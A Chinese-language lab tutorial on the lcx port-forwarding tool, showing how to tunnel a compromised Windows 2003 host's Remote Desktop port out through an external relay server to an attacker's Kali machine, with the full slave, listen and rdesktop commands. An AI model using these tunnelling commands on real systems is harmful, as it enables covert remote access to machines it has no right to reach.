局域网中的某台计算机仅仅开放了Web服务,该服务仅能供内网用户使用,而外网用户根本没有办法直接访问。因此要想让外网用户能够访问局域网中的系统服务,这必须进行端口映射等操作才行。端口映射在入侵内网的时候经常用到,特别是要登陆远程终端服务时,使用端口映射就非常方便。
一、lcx简介
lcx是一款端口转发工具,可以将肉鸡的某个端口转发到我们自己的外网主机上的某个端口,然后我们只需在内网机访问外网主机的端口达到访问肉鸡相应端口的效果。比如说,肉鸡A没有开放3389端口,我们将他的3389转发到自己的外网机B的9000端口,然后连接上B的9000之后,继续监听9001,我们在内网的攻击机C上通过访问B的9001端口,就可以连接到A的远程桌面。
二、lcx使用
lcx有windows版和linux版两个版本,这两个版本的lcx都具有三个功能:
监听;转发;端口转向。
在使用lcx时必须保证两个前提,肉鸡A和攻击机C都能够访问到外网机B;listen监听的端口之前不能被其它程序占用。Linux版的使用与Windows版大同小异,都是先在外网机B进行监听,之后在肉鸡A进行转发,然后在攻击机C进行访问。
不同的是,在转发过程中,Windows版的转发命令"-slave"命令后紧接的是外网机B的ip和端口号,然后再跟肉鸡A的ip和端口号,形如:lcx -slave IP(B) Port(B) IP(A) port(A);而linux版的对应的转发命令形如: ./portmap -m 3 – h1 IP(A) -p1 port(A) -h2 IP(B) -p2 port(B)。portmap为自己编译源文件生成的文件名。linux版的method 2对应的windows版的listen功能,即监听功能,method 1对应的是tran功能,即端口转向功能。我们常用到的是listen功能和转发功能slave。
三、实验环境
肉鸡A:
Win2003
IP:192.168.0.103
攻击机C:
kali linux
IP:192.168.0.107
外网机B:
Ecs Linux(Xshell连接)
IP:101.200.56.135
四、实验步骤
1.假设win2003是攻击的肉鸡
他只开放了80端口:
这样我们在攻击机上是不能对他有其他的操作的:
2.假设可以通过80端口把lcx端口转发工具传过去,并且可以执行命令
执行: lcx.exe -slave 101.200.56.135 9000 127.0.0.1 3389
这条命令是把本机的3389端口转发到公网上的9000端口。
3. 在服务器上设置
执行: ./lcx -listen 9000 9001
作用是进行本机转向。
注意,在使用linux下的lcx之前不要忘记make一下。
4. 攻击机远程连接肉鸡
执行rdesktop 101.200.56.135:9001
可以看到,这样在肉鸡没有开放其他端口的前提下,就成功连接到了肉鸡的3389端口。
特别注意:有时候端口转发失败,可以先在中间机上进行监听再转发。